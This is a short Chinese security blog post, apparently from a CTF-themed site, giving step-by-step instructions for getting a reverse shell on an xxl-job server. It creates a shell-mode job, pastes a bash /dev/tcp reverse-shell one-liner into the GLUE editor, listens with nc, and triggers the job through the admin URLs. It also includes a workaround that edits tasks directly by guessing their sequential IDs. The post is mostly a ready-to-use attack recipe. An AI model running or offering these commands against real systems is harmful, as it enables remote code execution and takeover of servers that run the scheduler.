xxl-job反弹shell

admin 2021年11月30日19:56:24安全博客 CTF专场xxl-job反弹shell已关闭评论68 views716字阅读2分23秒阅读模式

利用过程

点击任务管理、新增一个执行任务,配置如下(运行模式选择shell,cron是linux定时任务,如下0时0分0秒执行一次):

进入GLUE面板,写入执行的脚本命令。随意命名备注名称,保存并关闭

0<&196;exec 196<>/dev/tcp/10.0.01/4242; sh <&196 >&196 2>&196

服务器监听shell,受害机执行任务

nc -lvvp 4242

返回shell到服务器

参考: https://www.cnblogs.com/kbhome/p/13210394.html

遇到的问题

在添加任务后,提示添加成功,但不显示添加的任务,所以不能进入GLUE面板写脚本命令。

解决

添加一个无执行器的任务,记住ID,比如2xxl-job的任务ID是顺序添加的,所以下次添加的一定是3,然后添加有执行器的任务,按照上面的正常添加就行(注: 最好是去看看哪个任务带有执行器,有些是不会全有执行器的,确认好有执行器的任务后,添加相应的任务即可。)

虽然提示添加成功,但是不会显示任务,所以我们直接编辑对应ID的任务就行

编辑:

http://target/jobcode?jobId=3

这里的id=3为上述所说的,具体看你添加之前的ID是多少

执行:

http://target/jobinfo/trigger?id=3&executorParam=

相关推荐: AoiAWD 系统的安装和配置

最近打了几次AWD比赛,发现手中的工具依然不好用,在github上发现了AoiAWD,AoiAWD 是一个由Aodzip(安恒信息 海特实验室研究员、HAC战队成员)维护的一个针对于CTF AWD模式的开源项目。专为比赛设计,便携性好,低权限运行的EDR系统。…

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月30日19:56:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  xxl-job反弹shell http://cn-sec.com/archives/654949.html